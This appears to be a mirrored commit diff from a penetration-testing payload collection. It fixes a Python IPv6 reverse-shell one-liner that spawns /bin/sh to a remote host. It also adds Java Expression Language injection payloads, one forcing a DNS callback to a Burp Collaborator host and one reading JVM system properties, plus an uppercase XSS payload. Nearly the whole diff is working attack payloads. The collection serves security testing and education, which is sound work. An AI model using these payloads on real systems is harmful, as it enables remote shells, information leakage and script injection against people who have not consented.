mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Merge pull request #416 from Bort-Millipede/master
Expression Language Injection One-Liners; XSS Payload; Fixed Linux Py…
This commit is contained in:
commit
f89597725a
@ -150,7 +150,7 @@ python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty")
|
|||||||
|
|
||||||
IPv6 (No Spaces, Shortened)
|
IPv6 (No Spaces, Shortened)
|
||||||
```python
|
```python
|
||||||
python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),,2);p("/bin/sh")'
|
python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
|
||||||
```
|
```
|
||||||
|
|
||||||
Windows only
|
Windows only
|
||||||
|
@ -149,6 +149,16 @@ ${1+1}
|
|||||||
#{1+1}
|
#{1+1}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Expression Language EL - One-Liner injections not including code execution
|
||||||
|
|
||||||
|
```java
|
||||||
|
// DNS Lookup
|
||||||
|
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.burpcollaborator.net")}
|
||||||
|
|
||||||
|
// JVM System Property Lookup (ex: java.class.path)
|
||||||
|
${"".getClass().forName("java.lang.System").getDeclaredMethod("getProperty","".getClass()).invoke("","java.class.path")}
|
||||||
|
```
|
||||||
|
|
||||||
### Expression Language EL - Code Execution
|
### Expression Language EL - Code Execution
|
||||||
|
|
||||||
|
|
||||||
|
@ -260,6 +260,12 @@ e.g: 14.rs/#alert(document.domain)
|
|||||||
Use CTRL+SHIFT+X to trigger the onclick event
|
Use CTRL+SHIFT+X to trigger the onclick event
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### XSS when payload is reflected capitalized
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
<IMG SRC=1 ONERROR=alert(1)>
|
||||||
|
```
|
||||||
|
|
||||||
### DOM based XSS
|
### DOM based XSS
|
||||||
|
|
||||||
Based on a DOM XSS sink.
|
Based on a DOM XSS sink.
|
||||||
|
Loading…
Reference in New Issue
Block a user